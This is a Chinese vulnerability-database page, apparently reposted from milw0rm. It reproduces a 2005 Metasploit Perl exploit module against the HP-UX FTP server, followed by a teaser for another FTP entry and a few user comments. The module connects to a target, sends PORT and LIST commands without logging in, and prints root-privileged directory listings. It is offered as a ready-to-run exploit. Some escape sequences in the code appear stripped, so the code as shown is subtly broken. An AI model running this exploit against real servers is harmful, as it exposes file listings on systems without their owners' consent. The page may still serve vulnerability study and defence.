HP-UX FTP Server – Unauthenticated Directory Listing (Metasploit)
漏洞ID | 1055417 | 漏洞类型 | |
发布时间 | 2005-10-19 | 更新时间 | 2005-10-19 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | HP-UX | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::hpux_ftpd_preauth_list;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'HP-UX FTP Server Preauthentication Directory Listing',
'Version' => '$Revision: 1.8 $',
'Authors' => [ 'Optyx <optyx [at] uberhax0r.net>'],
'Arch' => [ ],
'OS' => [ 'hpux' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The FTP server port', 21],
'RPATH' => [1, 'DATA', 'The path name to list', "/"],
},
'Description' => Pex::Text::Freeform(qq{
This exploit abuses an unpublished vulnerability in the HP-UX FTP
service. This flaw allows an unauthenticated remote user to obtain
directory listings from this server with the privileges of the root
user. This vulnerability was silently patched by HP sometime between
2001 and 2003.
}),
'Refs' =>
[
# None
],
'Keys' => ['ftp'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('RPATH');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $l = IO::Socket::INET->new
(
Proto => 'tcp',
Listen => 5,
Blocking => 0,
ReuseAddr => 1,
);
my $r;
my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256);
my $sel = IO::Select->new($l);
my $cmd = "PORT ".join(",", split(/./,Pex::InternetIP($target_host))).$prt."rn";
$r .= $s->Recv(-1, 5);
$s->Send($cmd);
$r .= $s->Recv(-1, 5);
$s->Send("LIST $target_pathrn");
$r .= $s->Recv(-1, 5);
$s->Close;
foreach (split(/n/, $r)) {
chomp;
$self->PrintLine("[*] $_");
}
my @rdy = $sel->can_read(3);
if (scalar(@rdy)) {
my $x = $l->accept();
$self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport);
while (<$x>) {
chomp;
$self->PrintLine($_);
}
$x->shutdown(2);
$x->close;
}
$l->shutdown(2);
$l->close;
return;
}
# milw0rm.com [2005-10-19]
wu-ftp命令重写漏洞 漏洞ID 1207570 漏洞类型 未知 发布时间 1997-01-11 更新时间 1997-01-11 CVE编号 CVE-1999-0081 CNNVD-ID CNNVD-199701-049 漏洞平台 N/A CVSS评分 5.…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666